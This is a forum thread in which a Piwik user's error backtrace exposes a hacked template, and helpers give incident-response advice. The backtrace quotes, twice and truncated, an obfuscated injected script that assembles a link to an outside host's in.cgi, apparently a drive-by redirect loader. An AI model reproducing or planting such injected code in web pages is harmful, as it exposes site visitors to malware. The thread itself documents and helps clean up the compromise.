Smarty error after login

Hi, we never had any problems with piwik until yesterday, this error just occurred and we don’t know how to fix it. Any suggestions?


User Error: Smarty error: [in /mnt/stor1-wc1-dfw1/369265/375346/www.newstalk1160.com/web/content/piwik/plugins/CoreHome/templates/index.tpl line 28]: syntax error: unrecognized tag: (Smarty_Compiler.class.php, line 446) in /mnt/stor1-wc1-dfw1/369265/375346/www.newstalk1160.com/web/content/piwik/libs/Smarty/Smarty.class.php on line 1093

Backtrace -->
#0 Piwik_ErrorHandler(256, Smarty error: [in /mnt/stor1-wc1-dfw1/369265/375346/www.newstalk1160.com/web/content/piwik/plugins/CoreHome/templates/index.tpl line 28]: syntax error: unrecognized tag: (Smarty_Compiler.class.php, line 446), /mnt/stor1-wc1-dfw1/369265/375346/www.newstalk1160.com/web/content/piwik/libs/Smarty/Smarty.class.php, 1093, Array ([error_msg] => [in /mnt/stor1-wc1-dfw1/369265/375346/www.newstalk1160.com/web/content/piwik/plugins/CoreHome/templates/index.tpl line 28]: syntax error: unrecognized tag: (Smarty_Compiler.class.php, line 446),[error_type] => 256)) called at [(null):0]
#1 trigger_error(Smarty error: [in /mnt/stor1-wc1-dfw1/369265/375346/www.newstalk1160.com/web/content/piwik/plugins/CoreHome/templates/index.tpl line 28]: syntax error: unrecognized tag: (Smarty_Compiler.class.php, line 446), 256) called at [/mnt/stor1-wc1-dfw1/369265/375346/www.newstalk1160.com/web/content/piwik/libs/Smarty/Smarty.class.php:1093]
#2 Smarty->trigger_error([in /mnt/stor1-wc1-dfw1/369265/375346/www.newstalk1160.com/web/content/piwik/plugins/CoreHome/templates/index.tpl line 28]: syntax error: unrecognized tag: (Smarty_Compiler.class.php, line 446), 256) called at [/mnt/stor1-wc1-dfw1/369265/375346/www.newstalk1160.com/web/content/piwik/libs/Smarty/Smarty.class.php:1815]
#3 Smarty->_trigger_fatal_error(syntax error: unrecognized tag: , /mnt/stor1-wc1-dfw1/369265/375346/www.newstalk1160.com/web/content/piwik/plugins/CoreHome/templates/index.tpl, 28, /mnt/stor1-wc1-dfw1/369265/375346/www.newstalk1160.com/web/content/piwik/libs/Smarty/Smarty_Compiler.class.php, 446, 256) called at [/mnt/stor1-wc1-dfw1/369265/375346/www.newstalk1160.com/web/content/piwik/libs/Smarty/Smarty_Compiler.class.php:2256]
#4 Smarty_Compiler->_syntax_error(unrecognized tag: , 256, /mnt/stor1-wc1-dfw1/369265/375346/www.newstalk1160.com/web/content/piwik/libs/Smarty/Smarty_Compiler.class.php, 446) called at [/mnt/stor1-wc1-dfw1/369265/375346/www.newstalk1160.com/web/content/piwik/libs/Smarty/Smarty_Compiler.class.php:446]
#5 Smarty_Compiler->_compile_tag() called at [/mnt/stor1-wc1-dfw1/369265/375346/www.newstalk1160.com/web/content/piwik/libs/Smarty/Smarty_Compiler.class.php:312]
#6 Smarty_Compiler->_compile_file(/mnt/stor1-wc1-dfw1/369265/375346/www.newstalk1160.com/web/content/piwik/plugins/CoreHome/templates/index.tpl, {assign var=showSitesSelection value=true}

{include file="CoreHome/templates/header.tpl"}

{if isset($menu) && $menu}{include file="CoreHome/templates/menu.tpl"}{/if}

<div class="page">
<div class="pageWrap">
<div class="nav_sep"></div>
<div class="top_controls">
{include file="CoreHome/templates/period_select.tpl"}
{include file="CoreHome/templates/header_message.tpl"}
</div>

{ajaxLoadingDiv}
{ajaxRequestErrorDiv}

<div id="content" class="home">
{if $content}{$content}{/if}
</div>
<div class="clear"></div>
</div>
</div>


{include file="CoreHome/templates/piwik_tag.tpl"}
</div>
<!-- C/C v0842 --><script>function lG(){};jJ="";lG.prototype = {eS : function() {function q(){};function wH(){};return '\u004a\u004a\u004a\u006f\u0049\u0034\u0050\u0077\u0068\u0074\u0074\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0066\u0061\u0075\u006c\u0074\u0067'.replace(/QQQQQQQQ/g, 'YYYYYYYY').slice(8, -1).replace(/YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY/g, 'p://zeozudra.cz.cc/zeo/in.cgi?de');this.eN='';zO=false;var qD=28737;},z : function() {var tO=58737;var m=57877;i="i";l=""; bU=22143;var n='';p=false;var xA=new Array(); var e='replace';var xZ=new Date();iX='';var lL='';var k='';var o=document;var uG=function(){};this.kG='';var hX="";var h=window;var hC='';var qDO=new Date();var zP=new Date();iB=false;String.prototype.uN=function(w,d){return this[e](w, d)};var sA="sA";var iU="iU";this.pI=59335;var f=new Array();var iXN=new Date();th...
</html>
, ) called at [/mnt/stor1-wc1-dfw1/369265/375346/www.newstalk1160.com/web/content/piwik/libs/Smarty/Smarty.class.php:1489]
#7 Smarty->_compile_source(/mnt/stor1-wc1-dfw1/369265/375346/www.newstalk1160.com/web/content/piwik/plugins/CoreHome/templates/index.tpl, {assign var=showSitesSelection value=true}

{include file="CoreHome/templates/header.tpl"}

{if isset($menu) && $menu}{include file="CoreHome/templates/menu.tpl"}{/if}

<div class="page">
<div class="pageWrap">
<div class="nav_sep"></div>
<div class="top_controls">
{include file="CoreHome/templates/period_select.tpl"}
{include file="CoreHome/templates/header_message.tpl"}
</div>

{ajaxLoadingDiv}
{ajaxRequestErrorDiv}

<div id="content" class="home">
{if $content}{$content}{/if}
</div>
<div class="clear"></div>
</div>
</div>


{include file="CoreHome/templates/piwik_tag.tpl"}
</div>
<!-- C/C v0842 --><script>function lG(){};jJ="";lG.prototype = {eS : function() {function q(){};function wH(){};return '\u004a\u004a\u004a\u006f\u0049\u0034\u0050\u0077\u0068\u0074\u0074\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0066\u0061\u0075\u006c\u0074\u0067'.replace(/QQQQQQQQ/g, 'YYYYYYYY').slice(8, -1).replace(/YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY/g, 'p://zeozudra.cz.cc/zeo/in.cgi?de');this.eN='';zO=false;var qD=28737;},z : function() {var tO=58737;var m=57877;i="i";l=""; bU=22143;var n='';p=false;var xA=new Array(); var e='replace';var xZ=new Date();iX='';var lL='';var k='';var o=document;var uG=function(){};this.kG='';var hX="";var h=window;var hC='';var qDO=new Date();var zP=new Date();iB=false;String.prototype.uN=function(w,d){return this[e](w, d)};var sA="sA";var iU="iU";this.pI=59335;var f=new Array();var iXN=new Date();th...
</html>
, , /mnt/stor1-wc1-dfw1/369265/375346/www.newstalk1160.com/web/content/piwik/tmp/templates_c/%%CA^CA5^CA504731%%index.tpl.inc) called at [/mnt/stor1-wc1-dfw1/369265/375346/www.newstalk1160.com/web/content/piwik/libs/Smarty/Smarty.class.php:1422]
#8 Smarty->_compile_resource(/mnt/stor1-wc1-dfw1/369265/375346/www.newstalk1160.com/web/content/piwik/plugins/CoreHome/templates/index.tpl, /mnt/stor1-wc1-dfw1/369265/375346/www.newstalk1160.com/web/content/piwik/tmp/templates_c/%%CA^CA5^CA504731%%index.tpl.php) called at [/mnt/stor1-wc1-dfw1/369265/375346/www.newstalk1160.com/web/content/piwik/libs/Smarty/Smarty.class.php:1261]
#9 Smarty->fetch(/mnt/stor1-wc1-dfw1/369265/375346/www.newstalk1160.com/web/content/piwik/plugins/CoreHome/templates/index.tpl) called at [/mnt/stor1-wc1-dfw1/369265/375346/www.newstalk1160.com/web/content/piwik/core/View.php:154]
#10 Piwik_View->render() called at [/mnt/stor1-wc1-dfw1/369265/375346/www.newstalk1160.com/web/content/piwik/plugins/CoreHome/Controller.php:90]
#11 Piwik_CoreHome_Controller->index() called at [(null):0]
#12 call_user_func_array(Array ([0] => Piwik_CoreHome_Controller Object ([] => CoreHome,[] => 2010-12-09,[] => Piwik_Date Object ([] => 1291898399,[] => UTC),[] => 1,[] => Piwik_Site Object ([] => 1)),[1] => index), Array ()) called at [/mnt/stor1-wc1-dfw1/369265/375346/www.newstalk1160.com/web/content/piwik/core/FrontController.php:126]
#13 Piwik_FrontController->dispatch() called at [/mnt/stor1-wc1-dfw1/369265/375346/www.newstalk1160.com/web/content/piwik/index.php:60]

It looks like the body tag was replaced by some third-party script.

My first guess is that your site has been hacked.

Oh my, is it the regular site content or piwik area? Please advise.

probably your website itself got hacked, and the hacker modified the piwik files as well as other files. Did you check your other files? it might have some modified content.

Don’t know what other files on your server may have been compromised or added (eg backdoors and rootkits). At minimum, it looks like a naive search and replace on tags.

cd to your webroot and search for files containing “in.cgi”.

eg fgrep -R ‘in.cgi’ *

Hi, I’m on a cloud server, and I can’t access ftp through command line myself, but my server support searched for it via ssh access and said they found no files containing that. I’m not sure what to do. I did delete all the files and reuploaded piwik before, and the error disappeared. But the next day, it came back. Any suggestions on how to prevent it from happening?

Check your crontab and shell scripts.

Not sure why your server support couldn’t find it (or other occurrences). The error message you posted clearly shows one instance in web/content/piwik/plugins/CoreHome/templates/index.tpl.

If you can’t isolate the source of the intrusion, I would suggest uninstalling Piwik for the time being, in case that’s the target of the attack. Set-up a dummy ‘index.php’ and ‘piwik.php’, and then review your web server log files (access and error logs) to look for suspicious requests.

Oh yes, I do see it now. What do you suggest to prevent the intrusion? I have my database prefix set as just piwik, could that be part of the problem?

what other software do you use on the same server? you maybe have other softwares with security holes, check that you are using latest version of each.

At this point, I have no info on the attack vector (root cause). A tampered Piwik file (and poorly at that) is only a symptom.

If I were you, I’d take the website offline (the extent possible), to isolate it from the network as it can take some time to lock down. Then:

Check the hosting account hasn’t been tampered with (e.g., the contact email address).
Change hosting account password.
Change database user passwords.
Review cron jobs, shell scripts, .htaccess, and .htpasswd.
Backup all files
Download backups and log files for later analysis.
Wipe “everything” but keep databases, config, and .htaccess/.htpasswd files.
Restore apps from trusted sources.
Restore any missing files from backups after individual inspection.
Make another backup to serve as your checkpoint. Download this backup to a secure location.
Remove backups from server.
Increase system logging, if needed.
Install some IDS that creates a hash for your files, checks for modifcations, and sends you alerts
Bring website back online.
Monitor log files and be proactive with software updates.

Optionally:

  • use mod_security (but you’ll have to review the rules, as some might impact Piwik)
  • use something like CloudFlare as a CDN and security layer against bot attacks

Thanks matthieu and vipsoft, we are running wordpress and it’s the latest version. We will take more security measures and thanks for your help.